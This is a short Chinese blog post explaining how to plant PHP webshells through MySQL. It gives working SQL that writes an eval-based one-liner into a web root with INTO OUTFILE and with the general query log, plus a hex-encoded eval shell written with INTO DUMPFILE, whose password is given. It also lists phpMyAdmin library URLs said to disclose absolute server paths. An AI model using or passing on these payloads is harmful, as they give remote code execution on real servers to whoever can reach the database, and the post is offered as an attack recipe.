mysql 写入一句话

2019年8月3日23:18:34 评论 637

mysql 写入一句话
方法一:

1、SHOW VARIABLES LIKE "secure_file_priv"; 查看文件导出功能是否开启         如果:  secure_file_priv NULL 值为 null 说明禁止状态,无法导出为文件,需要修改MySQL配置文件:查看是否有 secure_file_priv =  ,没有的话添加上             如果为一个目录,如:secure_file_priv = /home 那就只能导出到指定的目录,子目录也不行             如果为为空,如 secure_file_priv = ,说明可以导出到任意位置,注意等号一定要有 2、写入:     select '<?php eval($_POST[kill]);?>'  into outfile 'E:/phpStudy/PHPTutorial/WWW/kill1.php';     导出的木马文件一定要在可执行的目录下,如果有phpinfo.php文件,可以确认一下;

方法二:

如果可以进入PHPmyadmin,但是无法导出文件,这时,可以进入变量, 搜索  general logOFF --这个默认是off,关闭的,把它打开     general log file --设置日志文件及位置          然后执行查询 select "<?php eval($_POST['hacker']);?>"     就可以连接日志文件了

补充:还可以直接用dumpfile来得到shell
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
加密部分为 lanker 一句话 密码为 cmd
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -

http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/string.lib.php  http://target/phpmyadmin/libraries/database_interface.lib.php http://target/phpmyadmin/libraries/db_table_exists.lib.php  http://target/phpmyadmin/libraries/display_export.lib.php http://target/phpmyadmin/libraries/header_meta_style.inc.php    http://target/phpmyadmin/libraries/mcrypt.lib.php

http://www.oniont.cn/index.php/archives/85.html

高性能云服务器2折起

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: